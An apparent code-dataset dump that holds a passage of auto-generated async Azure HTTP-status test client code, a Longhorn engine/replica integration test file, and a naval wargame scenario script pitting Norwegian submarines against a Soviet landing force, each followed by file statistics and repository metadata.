response = pipeline_response.http_response
if response.status_code not in [202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, pipeline_response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
patch202.metadata = {"url": "/http/success/202"} # type: ignore
@distributed_trace_async
async def post202(self, boolean_value: Optional[bool] = True, **kwargs: Any) -> None:
"""Post true Boolean value in request returns 202 (Accepted).
:param boolean_value: Simple boolean value true.
:type boolean_value: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if boolean_value is not None:
json = self._serialize.body(boolean_value, "bool")
else:
json = None
request = build_post202_request(
content_type=content_type,
json=json,
template_url=self.post202.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, pipeline_response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
post202.metadata = {"url": "/http/success/202"} # type: ignore
@distributed_trace_async
async def delete202(self, boolean_value: Optional[bool] = True, **kwargs: Any) -> None:
"""Delete true Boolean value in request returns 202 (accepted).
:param boolean_value: Simple boolean value true.
:type boolean_value: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if boolean_value is not None:
json = self._serialize.body(boolean_value, "bool")
else:
json = None
request = build_delete202_request(
content_type=content_type,
json=json,
template_url=self.delete202.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, pipeline_response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
delete202.metadata = {"url": "/http/success/202"} # type: ignore
@distributed_trace_async
async def head204(self, **kwargs: Any) -> None:
"""Return 204 status code if successful.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_head204_request(
template_url=self.head204.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, pipeline_response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
head204.metadata = {"url": "/http/success/204"} # type: ignore
@distributed_trace_async
async def put204(self, boolean_value: Optional[bool] = True, **kwargs: Any) -> None:
"""Put true Boolean value in request returns 204 (no content).
:param boolean_value: Simple boolean value true.
:type boolean_value: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if boolean_value is not None:
json = self._serialize.body(boolean_value, "bool")
else:
json = None
request = build_put204_request(
content_type=content_type,
json=json,
template_url=self.put204.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, pipeline_response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
put204.metadata = {"url": "/http/success/204"} # type: ignore
@distributed_trace_async
async def patch204(self, boolean_value: Optional[bool] = True, **kwargs: Any) -> None:
"""Patch true Boolean value in request returns 204 (no content).
:param boolean_value: Simple boolean value true.
:type boolean_value: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if boolean_value is not None:
json = self._serialize.body(boolean_value, "bool")
else:
json = None
request = build_patch204_request(
content_type=content_type,
json=json,
template_url=self.patch204.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, pipeline_response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
patch204.metadata = {"url": "/http/success/204"} # type: ignore
@distributed_trace_async
async def post204(self, boolean_value: Optional[bool] = True, **kwargs: Any) -> None:
"""Post true Boolean value in request returns 204 (no content).
:param boolean_value: Simple boolean value true.
:type boolean_value: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if boolean_value is not None:
json = self._serialize.body(boolean_value, "bool")
else:
json = None
request = build_post204_request(
content_type=content_type,
json=json,
template_url=self.post204.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, pipeline_response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
post204.metadata = {"url": "/http/success/204"} # type: ignore
@distributed_trace_async
async def delete204(self, boolean_value: Optional[bool] = True, **kwargs: Any) -> None:
"""Delete true Boolean value in request returns 204 (no content).
:param boolean_value: Simple boolean value true.
:type boolean_value: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if boolean_value is not None:
json = self._serialize.body(boolean_value, "bool")
else:
json = None
request = build_delete204_request(
content_type=content_type,
json=json,
template_url=self.delete204.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, pipeline_response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
delete204.metadata = {"url": "/http/success/204"} # type: ignore
@distributed_trace_async
async def head404(self, **kwargs: Any) -> None:
"""Return 404 status code.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_head404_request(
template_url=self.head404.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204, 404]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, pipeline_response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
head404.metadata = {"url": "/http/success/404"} # type: ignore
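# --- Illustrative driver sketch (editor's addition, not generated code) ---
# A minimal async caller for this operation group. The package import, client class
# name, and base_url are assumptions inferred from the httpinfrastructure package
# layout; adjust them to the actual generated client before use.
#
# import asyncio
# from httpinfrastructure.aio import AutoRestHttpInfrastructureTestService  # assumed client name
#
# async def main():
#     async with AutoRestHttpInfrastructureTestService(base_url="http://localhost:3000") as client:
#         await client.http_success.head200()  # raises HttpResponseError on anything but 200
#         assert await client.http_success.get200() is True
#
# asyncio.run(main())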
| 41.994069
| 106
| 0.662608
| 3,996
| 35,401
| 5.686436
| 0.051051
| 0.051226
| 0.030102
| 0.02174
| 0.88329
| 0.878977
| 0.878977
| 0.878581
| 0.878581
| 0.878581
| 0
| 0.023366
| 0.237168
| 35,401
| 842
| 107
| 42.043943
| 0.818071
| 0.0524
| 0
| 0.721022
| 0
| 0
| 0.042177
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001965
| false
| 0
| 0.021611
| 0
| 0.068762
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0 | 7 |
hexsha: e6d35dc2ef004be81b4ac49afc8fc1f957f0a704
size: 8,774
ext: py
lang: Python
max_stars_repo_path: integration/instance/test_launcher_basic.py
max_stars_repo_name: MalibuKoKo/longhorn-engine
max_stars_repo_head_hexsha: b31b3f177ebaadb222f733073ca6015ad01ae3ef
max_stars_repo_licenses: ["Apache-2.0"]
max_stars_count: null
max_stars_repo_stars_event_min_datetime: null
max_stars_repo_stars_event_max_datetime: null
max_issues_repo_path: integration/instance/test_launcher_basic.py
max_issues_repo_name: MalibuKoKo/longhorn-engine
max_issues_repo_head_hexsha: b31b3f177ebaadb222f733073ca6015ad01ae3ef
max_issues_repo_licenses: ["Apache-2.0"]
max_issues_count: null
max_issues_repo_issues_event_min_datetime: null
max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: integration/instance/test_launcher_basic.py
max_forks_repo_name: MalibuKoKo/longhorn-engine
max_forks_repo_head_hexsha: b31b3f177ebaadb222f733073ca6015ad01ae3ef
max_forks_repo_licenses: ["Apache-2.0"]
max_forks_count: null
max_forks_repo_forks_event_min_datetime: null
max_forks_repo_forks_event_max_datetime: null
content:
import tempfile
from common import ( # NOQA
em_client, pm_client, # NOQA
create_replica_process, create_engine_process,
delete_engine_process, wait_for_process_running,
wait_for_process_deletion, wait_for_engine_deletion,
check_dev_existence, wait_for_dev_deletion,
SIZE, UPGRADE_LONGHORN_BINARY,
INSTANCE_MANAGER_TYPE_ENGINE, PROC_STATE_RUNNING,
PROC_STATE_STOPPING, PROC_STATE_STOPPED,
VOLUME_NAME_BASE, ENGINE_NAME_BASE, REPLICA_NAME_BASE,
)
def test_start_stop_replicas(pm_client): # NOQA
rs = pm_client.process_list()
assert len(rs) == 0
for i in range(10):
tmp_dir = tempfile.mkdtemp()
name = REPLICA_NAME_BASE + str(i)
r = create_replica_process(pm_client, name=name, dir=tmp_dir)
assert r.spec.name == name
assert r.status.state == PROC_STATE_RUNNING
r = pm_client.process_get(name=name)
assert r.spec.name == name
assert r.status.state == PROC_STATE_RUNNING
rs = pm_client.process_list()
assert len(rs) == (i+1)
assert name in rs
r = rs[name]
assert r.spec.name == name
assert r.status.state == PROC_STATE_RUNNING
for i in range(10):
rs = pm_client.process_list()
assert len(rs) == (10-i)
name = REPLICA_NAME_BASE + str(i)
r = pm_client.process_delete(name=name)
assert r.spec.name == name
assert r.status.state in (PROC_STATE_STOPPING,
PROC_STATE_STOPPED)
wait_for_process_deletion(pm_client, name)
rs = pm_client.process_list()
assert len(rs) == (9-i)
rs = pm_client.process_list()
assert len(rs) == 0
def test_one_volume(pm_client, em_client): # NOQA
rs = pm_client.process_list()
assert len(rs) == 0
replica_args = []
for i in range(3):
tmp_dir = tempfile.mkdtemp()
name = REPLICA_NAME_BASE + str(i)
r = create_replica_process(pm_client, name=name, dir=tmp_dir)
assert r.spec.name == name
assert r.status.state == PROC_STATE_RUNNING
r = pm_client.process_get(name=name)
assert r.spec.name == name
assert r.status.state == PROC_STATE_RUNNING
rs = pm_client.process_list()
assert len(rs) == (i+1)
assert name in rs
assert r.spec.name == name
assert r.status.state == PROC_STATE_RUNNING
replica_args.append("tcp://localhost:"+str(r.status.port_start))
engine_name = ENGINE_NAME_BASE + "0"
volume_name = VOLUME_NAME_BASE + "0"
e = create_engine_process(em_client, name=engine_name,
volume_name=volume_name,
replicas=replica_args)
assert e.spec.name == engine_name
check_dev_existence(volume_name)
es = em_client.engine_list()
assert len(es) == 1
assert engine_name in es
e = es[engine_name]
assert e.spec.name == engine_name
assert e.status.process_status.state == PROC_STATE_RUNNING
ps = pm_client.process_list()
assert len(ps) == 4
delete_engine_process(em_client, engine_name)
# test duplicate call
delete_engine_process(em_client, engine_name)
wait_for_engine_deletion(em_client, engine_name)
# test duplicate call
delete_engine_process(em_client, engine_name)
ps = pm_client.process_list()
assert len(ps) == 3
for i in range(3):
name = REPLICA_NAME_BASE + str(i)
r = pm_client.process_delete(name=name)
assert r.spec.name == name
assert r.status.state in (PROC_STATE_STOPPING,
PROC_STATE_STOPPED)
wait_for_process_deletion(pm_client, name)
ps = pm_client.process_list()
assert len(ps) == 0
def test_multiple_volumes(pm_client, em_client): # NOQA
rs = pm_client.process_list()
assert len(rs) == 0
cnt = 5
for i in range(cnt):
replica_args = []
tmp_dir = tempfile.mkdtemp()
replica_name = REPLICA_NAME_BASE + str(i)
r = create_replica_process(pm_client, name=replica_name, dir=tmp_dir)
assert r.spec.name == replica_name
assert r.status.state == PROC_STATE_RUNNING
r = pm_client.process_get(name=replica_name)
assert r.spec.name == replica_name
assert r.status.state == PROC_STATE_RUNNING
rs = pm_client.process_list()
assert len(rs) == (2*i+1)
assert replica_name in rs
r = rs[replica_name]
assert r.spec.name == replica_name
assert r.status.state == PROC_STATE_RUNNING
replica_args.append("tcp://localhost:"+str(r.status.port_start))
engine_name = ENGINE_NAME_BASE + str(i)
volume_name = VOLUME_NAME_BASE + str(i)
e = create_engine_process(em_client, name=engine_name,
volume_name=volume_name,
replicas=replica_args)
assert e.spec.name == engine_name
check_dev_existence(volume_name)
es = em_client.engine_list()
assert len(es) == (i+1)
assert engine_name in es
e = es[engine_name]
assert e.spec.name == engine_name
assert e.status.process_status.state == PROC_STATE_RUNNING
ps = pm_client.process_list()
assert len(ps) == 2*(i+1)
for i in range(cnt):
engine_name = ENGINE_NAME_BASE + str(i)
volume_name = VOLUME_NAME_BASE + str(i)
delete_engine_process(em_client, engine_name)
wait_for_engine_deletion(em_client, engine_name)
wait_for_dev_deletion(volume_name)
es = em_client.engine_list()
assert len(es) == (cnt-1-i)
assert engine_name not in es
def test_engine_upgrade(pm_client, em_client): # NOQA
rs = pm_client.process_list()
assert len(rs) == 0
dir_base = "/tmp/replica"
cnt = 3
for i in range(cnt):
replica_args = []
dir = dir_base + str(i)
replica_name = REPLICA_NAME_BASE + str(i)
r = create_replica_process(pm_client, name=replica_name, dir=dir)
assert r.spec.name == replica_name
assert r.status.state == PROC_STATE_RUNNING
r = pm_client.process_get(name=replica_name)
assert r.spec.name == replica_name
assert r.status.state == PROC_STATE_RUNNING
rs = pm_client.process_list()
assert len(rs) == (2*i+1)
assert replica_name in rs
r = rs[replica_name]
assert r.spec.name == replica_name
assert r.status.state == PROC_STATE_RUNNING
replica_args.append("tcp://localhost:"+str(r.status.port_start))
engine_name = ENGINE_NAME_BASE + str(i)
volume_name = VOLUME_NAME_BASE + str(i)
e = create_engine_process(em_client, name=engine_name,
volume_name=volume_name,
replicas=replica_args)
assert e.spec.name == engine_name
check_dev_existence(volume_name)
es = em_client.engine_list()
assert len(es) == (i+1)
assert engine_name in es
e = es[engine_name]
assert e.spec.name == engine_name
assert e.status.process_status.state == PROC_STATE_RUNNING
ps = pm_client.process_list()
assert len(ps) == 2*(i+1)
dir = dir_base + "0"
engine_name = ENGINE_NAME_BASE + "0"
replica_name = REPLICA_NAME_BASE + "0"
volume_name = VOLUME_NAME_BASE + "0"
replica_name_upgrade = REPLICA_NAME_BASE + "0-upgrade"
r = create_replica_process(pm_client, name=replica_name_upgrade,
binary=UPGRADE_LONGHORN_BINARY, dir=dir)
assert r.spec.name == replica_name_upgrade
assert r.status.state == PROC_STATE_RUNNING
replica_args = ["tcp://localhost:"+str(r.status.port_start)]
e = em_client.engine_upgrade(engine_name,
UPGRADE_LONGHORN_BINARY,
SIZE, replica_args)
assert e.spec.name == engine_name
check_dev_existence(volume_name)
r = pm_client.process_delete(name=replica_name)
assert r.spec.name == replica_name
assert r.status.state in (PROC_STATE_STOPPING,
PROC_STATE_STOPPED)
wait_for_process_deletion(pm_client, replica_name)
check_dev_existence(volume_name)
wait_for_process_running(em_client, engine_name,
INSTANCE_MANAGER_TYPE_ENGINE)
es = em_client.engine_list()
assert engine_name in es
e = es[engine_name]
assert e.spec.name == engine_name
assert e.status.process_status.state == PROC_STATE_RUNNING
delete_engine_process(em_client, engine_name)
wait_for_engine_deletion(em_client, engine_name)
wait_for_dev_deletion(volume_name)
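# --- Illustrative helper sketch (editor's addition, not part of the test suite) ---
# The tests above repeat the same replica-then-engine bring-up; a hypothetical helper
# built only from names this file already imports from common:
def _bring_up_volume(pm_client, em_client, index):
    replica_name = REPLICA_NAME_BASE + str(index)
    r = create_replica_process(pm_client, name=replica_name, dir=tempfile.mkdtemp())
    assert r.status.state == PROC_STATE_RUNNING
    replica_args = ["tcp://localhost:" + str(r.status.port_start)]
    engine_name = ENGINE_NAME_BASE + str(index)
    volume_name = VOLUME_NAME_BASE + str(index)
    e = create_engine_process(em_client, name=engine_name,
                              volume_name=volume_name,
                              replicas=replica_args)
    assert e.spec.name == engine_name
    check_dev_existence(volume_name)
    return replica_name, engine_name, volume_name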
| 32.376384
| 77
| 0.640985
| 1,203
| 8,774
| 4.349127
| 0.064007
| 0.078364
| 0.050459
| 0.064985
| 0.862576
| 0.844419
| 0.819381
| 0.800268
| 0.781346
| 0.734327
| 0
| 0.006236
| 0.268977
| 8,774
| 270
| 78
| 32.496296
| 0.809479
| 0.007864
| 0
| 0.784314
| 0
| 0
| 0.010465
| 0
| 0
| 0
| 0
| 0
| 0.357843
| 1
| 0.019608
| false
| 0
| 0.009804
| 0
| 0.029412
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0 | 7 |
hexsha: e6e25260920fe9938a61b4a9f72fbabbffc61eef
size: 40,741
ext: py
lang: Python
max_stars_repo_path: scenarios/SinglePlayer/ColdWar/Interception.py
max_stars_repo_name: dhanin/friendly-bassoon
max_stars_repo_head_hexsha: fafcfd3921805baddc1889dc0ee2fa367ad882f8
max_stars_repo_licenses: ["BSD-3-Clause"]
max_stars_count: 2
max_stars_repo_stars_event_min_datetime: 2021-11-17T10:59:38.000Z
max_stars_repo_stars_event_max_datetime: 2021-11-17T10:59:45.000Z
max_issues_repo_path: scenarios/SinglePlayer/ColdWar/Interception.py
max_issues_repo_name: dhanin/nws
max_issues_repo_head_hexsha: 87a3f24a7887d84b9884635064b48d456b4184e2
max_issues_repo_licenses: ["BSD-3-Clause"]
max_issues_count: null
max_issues_repo_issues_event_min_datetime: null
max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: scenarios/SinglePlayer/ColdWar/Interception.py
max_forks_repo_name: dhanin/nws
max_forks_repo_head_hexsha: 87a3f24a7887d84b9884635064b48d456b4184e2
max_forks_repo_licenses: ["BSD-3-Clause"]
max_forks_count: null
max_forks_repo_forks_event_min_datetime: null
max_forks_repo_forks_event_max_datetime: null
content:
# Created on 11/07/14 03:28:30
from math import *
from random import *
from UnitCommands import *
def CreateScenario(SM):
SM.SetScenarioDescription("""Interception\n\nA scenario for Global Conflicts 2.\n\nInterception is a typical Cold War scenario putting Norwegian subs\nagainst an approaching Soviet landing force.\n\nYou are to sink the hostile LSTs before they take your Naval Base.\n\n\n\n\n\n""")
SM.SetScenarioName("""Interception""")
SM.CreateAlliance(1, 'Norway')
SM.SetAllianceDefaultCountry(1, 'Norway')
SM.SetAlliancePlayable(1, 1)
SM.CreateAlliance(2, 'USSR')
SM.SetAllianceDefaultCountry(2, 'USSR')
SM.SetAlliancePlayable(2, 0)
SM.CreateAlliance(3, 'Sweden')
SM.SetAllianceDefaultCountry(3, 'Sweden')
SM.SetAlliancePlayable(3, 0)
SM.SetAllianceRelationship(1, 3, 'Neutral')
SM.SetAllianceRelationship(2, 3, 'Neutral')
SM.SetUserAlliance(1)
SM.SetDateTime(1988,8,4,12,0,0)
SM.SetStartTheater(15.029165, 68.470833) # (lon, lat) in degrees, negative is West or South
SM.SetScenarioLoaded(1)
SM.SetSeaState(2)
SM.SetSVP('0.000000,1515.000000,200.000000,1500.000000,300.000000,1510.000000,500.000000,1520.000000,5000.000000,1600.000000')
####################
SM.SetSimpleBriefing(1, """TASKING ORDERS FOR CMDR NORWEGIAN OPERATIONS\n\nINTELLIGENCE\n\nThe Soviets try to capture our Naval Base at Harstad. A task force is \napproaching. You have only a few assets available to stop the hostile \nforces.\n\nMISSION\n\nSink the two LSTs.\n\nEXECUTION\n\nUse your air assets to gather information. Coordinate your subs. \n\nCOMMAND AND SIGNAL\n\nHNoMS Utsira\n\n\n""")
####################
SM.SetSimpleBriefing(2, """TASKING ORDERS:\n\n\nNO ADDITIONAL INTELLIGENCE AVAILABLE.\n""")
####################
SM.SetSimpleBriefing(3, """No briefing found""")
##############################
### Alliance 1 units
##############################
unit = SM.GetDefaultUnit()
unit.className = 'Airstrip'
unit.unitName = "Airfield Harstad"
unit.SetPosition(16.060294, 68.454419, -0.0)
unit.heading = 90.00
unit.speed = 0.0
unit.cost = 20000000.0
SM.AddUnitToAlliance(unit, 1)
UI = SM.GetUnitInterface(unit.unitName)
SM.AddToUnitMagazine("Airfield Harstad", 'Fuel', 1000228)
SM.AddToUnitMagazine("Airfield Harstad", 'Mk-46 Mod5', 46)
SM.AddToUnitMagazine("Airfield Harstad", 'DICASS (85) Sonobuoy', 120)
SM.AddToUnitMagazine("Airfield Harstad", 'LOFAR (85) Sonobuoy', 120)
SM.AddToUnitMagazine("Airfield Harstad", 'DIFAR (85) Sonobuoy', 360)
SM.AddToUnitMagazine("Airfield Harstad", 'AGM-65D', 16)
SM.AddToUnitMagazine("Airfield Harstad", 'Flare-1', 100)
SM.AddToUnitMagazine("Airfield Harstad", 'Chaff-1', 100)
UI.AddTask('RefuelAllAircraft', 3.000000, 3)
BB = UI.GetBlackboardInterface()
SM.AddUnitToFlightDeck('Airfield Harstad', 'P-3C II Orion', 'ASW Harstad-1', 2)
SM.SetFlightDeckUnitLoadout('Airfield Harstad', 'ASW Harstad-1', '17 DICASS (85) Sonobuoy;17 LOFAR (85) Sonobuoy;50 DIFAR (85) Sonobuoy;2 Mk-46 Mod5;2 AGM-65D;2 AGM-65D;2 Mk-46 Mod5;2 Mk-46 Mod5;8 Mk-46 Mod5;30 Chaff-1;30 Flare-1;')
SM.AddUnitToFlightDeck('Airfield Harstad', 'P-3C II Orion', 'ASW Harstad-2', 2)
SM.SetFlightDeckUnitLoadout('Airfield Harstad', 'ASW Harstad-2', '17 DICASS (85) Sonobuoy;17 LOFAR (85) Sonobuoy;50 DIFAR (85) Sonobuoy;2 Mk-46 Mod5;2 AGM-65D;2 AGM-65D;2 Mk-46 Mod5;2 Mk-46 Mod5;8 Mk-46 Mod5;30 Chaff-1;30 Flare-1;')
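# Note (editor's addition): each loadout string above is a semicolon-separated list of
# "<count> <weapon name>" entries, and every weapon it names is also stocked in the
# airfield's magazine by the AddToUnitMagazine calls earlier in this block.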
unit = SM.GetDefaultUnit()
unit.className = 'Communications Station'
unit.unitName = "Harstad Naval Base"
unit.SetPosition(16.060752, 68.441299, 1.0)
unit.heading = 90.00
unit.speed = 0.0
unit.cost = 0.0
SM.AddUnitToAlliance(unit, 1)
UI = SM.GetUnitInterface(unit.unitName)
UI.AddTask('PointDefense', 3.000000, 3)
BB = UI.GetBlackboardInterface()
unit = SM.GetDefaultUnit()
unit.className = 'Kobben'
unit.unitName = "HNoMS Skolpen"
unit.SetPosition(14.961361, 68.200082, -100.0)
unit.heading = 213.69
unit.speed = 3.9
unit.cost = 0.0
SM.AddUnitToAlliance(unit, 1)
SM.SetUnitLauncherItem(unit.unitName, 0, 'Type-612 Torpedo', 1)
SM.SetUnitLauncherItem(unit.unitName, 1, 'Type-612 Torpedo', 1)
SM.SetUnitLauncherItem(unit.unitName, 2, 'Type-612 Torpedo', 1)
SM.SetUnitLauncherItem(unit.unitName, 3, 'Type-612 Torpedo', 1)
SM.SetUnitLauncherItem(unit.unitName, 4, 'Type-612 Torpedo', 1)
SM.SetUnitLauncherItem(unit.unitName, 5, 'Type-612 Torpedo', 1)
SM.SetUnitLauncherItem(unit.unitName, 6, 'NT37C', 1)
SM.SetUnitLauncherItem(unit.unitName, 7, 'NT37C', 1)
UI = SM.GetUnitInterface(unit.unitName)
SM.AddToUnitMagazine("HNoMS Skolpen", 'Type-612 Torpedo', 6)
SM.AddToUnitMagazine("HNoMS Skolpen", 'NT37C', 6)
UI.SetSensorState(3, 0)
UI.AddTask('AvoidCav', 3.000000, 3)
UI.AddTask('SubBattery', 4.000000, 3)
UI.AddTask('SubEvade', 3.000000, 3)
BB = UI.GetBlackboardInterface()
unit = SM.GetDefaultUnit()
unit.className = 'Kobben'
unit.unitName = "HNoMS Utsira"
unit.SetPosition(15.284451, 68.167768, -100.0)
unit.heading = 250.62
unit.speed = 4.0
unit.cost = 0.0
SM.AddUnitToAlliance(unit, 1)
SM.SetUnitLauncherItem(unit.unitName, 0, 'Type-612 Torpedo', 1)
SM.SetUnitLauncherItem(unit.unitName, 1, 'Type-612 Torpedo', 1)
SM.SetUnitLauncherItem(unit.unitName, 2, 'Type-612 Torpedo', 1)
SM.SetUnitLauncherItem(unit.unitName, 3, 'Type-612 Torpedo', 1)
SM.SetUnitLauncherItem(unit.unitName, 4, 'Type-612 Torpedo', 1)
SM.SetUnitLauncherItem(unit.unitName, 5, 'Type-612 Torpedo', 1)
SM.SetUnitLauncherItem(unit.unitName, 6, 'NT37C', 1)
SM.SetUnitLauncherItem(unit.unitName, 7, 'NT37C', 1)
UI = SM.GetUnitInterface(unit.unitName)
SM.AddToUnitMagazine("HNoMS Utsira", 'Type-612 Torpedo', 6)
SM.AddToUnitMagazine("HNoMS Utsira", 'NT37C', 6)
UI.SetSensorState(3, 0)
UI.AddTask('AvoidCav', 3.000000, 3)
UI.AddTask('SubBattery', 4.000000, 3)
UI.AddTask('SubEvade', 3.000000, 3)
BB = UI.GetBlackboardInterface()
##############################
### Alliance 2 units
##############################
unit = SM.GetDefaultUnit()
unit.className = 'Pr 641B Som'
unit.unitName = "B-437 Magnitogorsk"
unit.SetPosition(14.829352, 68.030604, -200.0)
unit.heading = 28.76
unit.speed = 3.9
unit.cost = 0.0
SM.AddUnitToAlliance(unit, 2)
SM.SetUnitLauncherItem(unit.unitName, 0, 'SET-65M', 1)
SM.SetUnitLauncherItem(unit.unitName, 1, 'SET-65M', 1)
SM.SetUnitLauncherItem(unit.unitName, 2, 'SET-65M', 1)
SM.SetUnitLauncherItem(unit.unitName, 3, 'SET-65M', 1)
SM.SetUnitLauncherItem(unit.unitName, 4, '53-65M', 1)
SM.SetUnitLauncherItem(unit.unitName, 5, '53-65M', 1)
UI = SM.GetUnitInterface(unit.unitName)
SM.AddToUnitMagazine("B-437 Magnitogorsk", 'SET-65M', 12)
SM.AddToUnitMagazine("B-437 Magnitogorsk", '53-65M', 6)
UI.SetSensorState(0, 0)
UI.SetSensorState(4, 0)
UI.AddTask('AvoidCav', 3.000000, 3)
UI.AddTask('EngageAll', 2.000000, 0)
UI.AddTask('Nav', 1.000000, 0)
UI.AddNavWaypointAdvanced(0.262058, 1.190724, 0.000000, 0.000000)
UI.AddNavWaypointAdvanced(0.265758, 1.189080, 0.000000, 0.000000)
UI.SetNavLoopState(1)
UI.AddTask('SubBattery', 4.000000, 3)
UI.AddTask('SubEvade', 3.000000, 3)
BB = UI.GetBlackboardInterface()
